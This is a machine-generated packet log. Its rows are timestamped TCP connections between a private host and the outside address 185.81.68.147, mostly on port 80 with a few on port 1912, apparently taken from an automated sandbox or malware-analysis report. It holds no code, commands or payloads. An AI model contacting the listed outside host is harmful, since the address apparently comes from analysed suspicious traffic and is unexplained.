                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.397450924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.397553921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.397608995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.398322105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.398444891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.398494959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.399204016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.399276972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.399327040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.400124073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.400218010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.400273085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.401006937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.401103020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.401154995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.401843071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.401967049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.402018070 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.402731895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.402790070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.402843952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.403594017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.403724909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.403779030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.404474020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.404561996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.404613018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.405407906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.405528069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.405580997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.406239986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.406280994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.406330109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.407109022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.407253981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.407310009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.407978058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.408099890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.408158064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.408909082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.409029007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.409081936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.409739017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.409812927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.409864902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.410593033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.410721064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.410777092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.411489010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.411602974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.411655903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.412373066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.412419081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.412470102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.413234949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.413345098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.413395882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.414130926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.414267063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.414318085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.415029049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.415124893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.415179014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.415910959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.416002035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.416053057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.416747093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.416924000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.417030096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.417635918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.417695045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.417743921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.418512106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.418632030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.418689966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.419389963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.419481039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.419533968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.420237064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.420341015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.420392036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.421130896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.421261072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.421314001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.422033072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.422185898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.422245026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.422823906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.423340082 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.465260983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.543010950 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.569120884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.569166899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.569222927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.569456100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.569514990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.569564104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.570157051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.570255041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.570302963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.570993900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.571095943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.571150064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.571891069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.572005033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.572053909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.572779894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.572882891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.572933912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.573653936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.573740959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.573801994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.574537992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.574677944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.574736118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.575392962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.575535059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.575587988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.576261997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.576395988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.576448917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.577151060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.577297926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.577363968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.578056097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.578169107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.578227997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.578893900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.578998089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.579047918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.579834938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.579958916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.580008984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.580693007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.580790043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.580842018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.581531048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.581672907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.581722975 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.582586050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.582693100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.582741976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.583276033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.583389997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.583444118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.584168911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.584425926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.584491014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.585053921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.585150957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.585201979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.585925102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.586009979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.586055994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.586808920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.586906910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.586957932 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.587694883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.587785006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.587841034 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.588531017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.588629007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.588685036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.589417934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.589529037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.589581013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.590399981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.590487957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.590543985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.591183901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.591327906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.591379881 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.592063904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.592152119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.592199087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.592972040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.593139887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.593189001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.593813896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.593952894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.594002008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.594670057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.594800949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.594850063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.595561981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.595690012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.595738888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.596543074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.596564054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.596623898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.597327948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.597419977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.597466946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.598193884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.598320961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.598372936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.599087954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.599188089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.599237919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.599951029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.600056887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.600109100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.600814104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.600920916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.600996017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.601699114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.601828098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.601876020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.602612972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.602696896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.602745056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.603555918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.603662014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.603712082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.604346991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.604511023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.604558945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.605216026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.605343103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.605392933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.606074095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.606194019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.606242895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.606977940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.607089043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.607141018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.607904911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.608016014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.608066082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.608695030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.608812094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.608866930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.609591961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.609705925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.609756947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.610460043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.610579014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.610640049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.611330032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.611449957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.611553907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.612217903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.612349987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.612404108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.613132954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.613240004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.613291979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.614090919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.614243031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.614294052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.614882946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.655770063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.761215925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.761276960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.761435986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.761559963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.761571884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.761609077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.762492895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.762518883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.762588978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.763211966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.763309956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.763370037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.764045000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.764117956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.764178991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.764939070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.765005112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.765064001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.765782118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.765894890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.765958071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.766791105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.766853094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.766911030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.767635107 CET8049723185.81.68.147192.168.2.10
